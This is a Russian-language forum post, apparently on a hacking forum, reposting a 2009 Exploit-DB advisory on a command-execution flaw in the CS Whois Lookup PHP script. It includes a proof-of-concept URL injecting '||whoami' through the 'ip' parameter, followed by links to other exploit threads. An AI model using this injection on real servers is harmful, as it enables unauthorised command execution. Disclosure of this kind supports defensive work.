Exploit CS Whois Lookup - 'ip' Remote Command Execution

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 340 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 32952

Проверка EDB

Пройдено

Автор: SIRGOD

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: N/A

Дата публикации: 2009-04-23

Код:

source: https://www.securityfocus.com/bid/34700/info

CS Whois Lookup is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected software and possibly the computer. 

http://www.example.com/path/index.php?ip=||whoami

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cross-Site Scripting

Ответы: 0

Просмотры: 401

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit CGI City CC Whois 1.0 - MetaCharacter

Ответы: 0

Просмотры: 313

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Kootenay Web Inc whois 1.0 - Remote Command Execution

Ответы: 0

Просмотры: 328

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Andy's PHP Projects Man Page Lookup Script - Information Disclosure

Ответы: 0

Просмотры: 356

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)

Ответы: 0

Просмотры: 2K

Эксплойты & Уязвимости 21 Июл 2024

Exploiter

Exploit Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)

Ответы: 1

Просмотры: 1K

Эксплойты & Уязвимости 28 Сен 2024

meselem

M

Exploit Webutler v3.2 - Remote Code Execution (RCE)

Ответы: 0

Просмотры: 603

Эксплойты & Уязвимости 21 Июл 2024

Exploiter

Exploit Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)

Ответы: 0

Просмотры: 585

Эксплойты & Уязвимости 21 Июл 2024

Exploiter

Exploit SPIP v4.2.0 - Remote Code Execution (Unauthenticated)

Ответы: 0

Просмотры: 887

Эксплойты & Уязвимости 21 Июл 2024

Exploiter

Exploit PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

Ответы: 0

Просмотры: 596

Эксплойты & Уязвимости 21 Июл 2024

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.